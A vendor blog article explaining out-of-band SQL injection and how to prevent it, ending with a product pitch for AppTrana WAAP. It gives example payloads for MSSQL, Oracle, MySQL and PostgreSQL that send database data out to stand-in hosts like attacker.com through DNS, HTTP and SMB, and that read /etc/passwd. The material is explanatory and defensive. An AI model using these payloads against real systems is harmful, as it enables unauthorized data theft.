Out-of-Band SQLi: How It Works, Risks & Prevention

What is Out-of-Band SQL Injection? 

Out-of-Band SQL Injection (OOB SQLi) is an advanced attack technique that allows attackers to extract data from a database even when direct responses are blocked. Unlike traditional SQL injection, which retrieves data within the same request-response cycle, OOB SQLi exfiltrates data through external communication channels such as DNS lookups or HTTP requests. 

Many web applications interact with databases to store and retrieve user data. If an application fails to properly handle SQL queries and allows unfiltered user input, attackers can manipulate these queries to perform unauthorized actions. Out-of-Band SQL Injection is particularly dangerous because it remains effective even when error-based and time-based SQLi methods are mitigated. 

How Does Out-of-Band SQL Injection Work? 

OOB SQL Injection works by forcing a database to establish an outbound connection to an attacker-controlled server. Since the attacker cannot directly retrieve results within the same web response, they exploit built-in database functions that facilitate external interactions. 

Steps of an OOB SQL Injection Attack

1. Identifying a Vulnerable Input Field – The attacker finds a website form, API, or request where SQL queries are executed without proper sanitization. 
2. Injecting Malicious SQL Code – Instead of entering expected data, the attacker crafts a payload that forces the database to send data to an external server. 
3. Receiving Data on an External Server – The attacker captures the response on their controlled domain, extracting sensitive information without the application’s direct response. 

Example of an Out-of-Band SQL Injection Attack 

Consider an application that logs failed login attempts in the database: 

 

INSERT INTO logs (user, ip, status) VALUES ('admin', '192.168.1.1', 'failed'); 

 

An attacker can inject the following SQL command: 

 

admin'; exec xp_cmdshell('nslookup myserver.com') -- 

 

This forces the database to perform a DNS lookup to myserver.com, which is controlled by the attacker. This confirms the vulnerability and enables data exfiltration. 

Attackers often use tools like SQLmap to automate exploitation. With minimal effort, they can craft payloads that extract sensitive data without direct system access, making detection and mitigation even more challenging. 

Common Techniques Used in Out-of-Band SQL Injection (OOB SQLi) 

1. DNS Exfiltration 

Attackers inject SQL payloads that trigger DNS lookups to an attacker-controlled server. 

Example: 

 

SELECT LOAD_FILE(CONCAT('\\\\', (SELECT database()), '.attacker.com\\data')); 

 

The attacker’s server logs the request, revealing database information. 

Check out how to prevent DNS exfiltration attacks

2. HTTP Requests to External Servers 

Attackers force the database to send HTTP requests to an external server they control. 

Example: 

 

xp_cmdshell 'curl http://attacker.com/?data=' + (SELECT user FROM dual);>

 

The attacker captures the response containing sensitive data. 

Out-of-Band SQL Injection in Major Databases 

Oracle  

• Using UTL_HTTP for Data Exfiltration – In Oracle databases, attackers use UTL_HTTP to send queries externally. 

Example: 

 

DECLARE
req UTL_HTTP.req;
BEGIN
req := UTL_HTTP.begin_request('http://attacker.com/'||(SELECT user FROM dual));
UTL_HTTP.end_request(req);
END; 

 

This sends database information to the attacker’s server. 

Learn more about data exfiltration prevention

MSSQL (Microsoft SQL Server)  

Using xp_dirtree for SMB-Based Data Exfiltration – Attackers use xp_dirtree to trigger outbound Server Message Block  

Example: 

 

EXEC xp_dirtree '\\attacker.com\leakdata\' + (SELECT user); 

 

The attacker captures and cracks the NTLM hash. 

MySQL 

Exploiting LOAD_FILE() to Read and Exfiltrate Data – Attackers read sensitive files and send data externally via an error-based response. 

Example: 

 

SELECT LOAD_FILE('/etc/passwd') INTO OUTFILE '\\\\attacker.com\\data.txt'; 

PostgreSQL 

Using pg_read_file() to Extract Files and Send Data Remotely – Attackers read server files and use dblink or COPY to send data remotely. 

Example: 

 

SELECT pg_read_file('/etc/passwd'); 

How to Prevent Out-of-Band SQL Injection 

Use Secure Database Queries

Implement prepared statements and parameterized queries to prevent direct execution of user input within SQL commands. 

• Example (Python with MySQL): 

 

cursor.execute("SELECT * FROM users WHERE email = %s", (user_email,)) 

 

This ensures user inputs are treated as data, not executable code. 

Restrict Outbound Database Connections

Since OOB SQLi relies on external requests, block outbound traffic from database servers unless absolutely necessary. 

Disable Dangerous Functions

If your database supports functions that can be abused for external calls, disable them. 

• Example (MSSQL): 

 

EXEC sp_configure 'show advanced options', 0; 

sp_configure 'xp_cmdshell', 0; 

Restrict Outbound Network Connections from the Database Server 

• Disable unnecessary outbound internet access to prevent exfiltration via DNS or HTTP requests. 
• Use Web Application firewalls to block unauthorized outbound traffic. 
• Monitor DNS queries from the database server for anomalies. 
• Leverage DNSSEC (Domain Name System Security Extensions) to protect against DNS-based attacks by ensuring the integrity and authenticity of DNS responses. 

Content Security Policy (CSP) and Data Exfiltration Restrictions

If attackers attempt to send data via malicious JavaScript, CSP (Content Security Policy) can help prevent execution, reducing the risk of stolen data being transmitted via browser-based exploits. 

Conduct Regular Security Testing 

• Automated Security Testing scans for misconfigurations and known SQL injection patterns, including those requiring out-of-band communication. 
• Penetration Testing simulates real-world attack scenarios, uncovering blind spots where delayed or external server interactions might indicate an OOB SQLi attempt.

How AppTrana WAAP Helps 

AppTrana WAAP provides real-time protection against SQL injection attacks by analyzing incoming requests and blocking malicious payloads before they reach the database. Additionally, it secures outbound traffic, preventing data exfiltration via covert channels like HTTP requests, ensuring that any OOB SQL injection attempts are effectively intercepted and blocked. Its inbuilt DAST scanner scans and detects vulnerabilities in real-time, identifying potential SQL injection risks before they can be exploited. 

Further, its DNSSEC capabilities help prevent Out-of-Band (OOB) SQLi exfiltration by securing DNS records. This ensures that attackers cannot exploit malicious DNS queries to extract sensitive data, effectively blocking DNS-based OOB communication channels. By combining advanced WAF protection and secure DNS management, AppTrana WAAP helps businesses stay protected against sophisticated SQL injection attacks.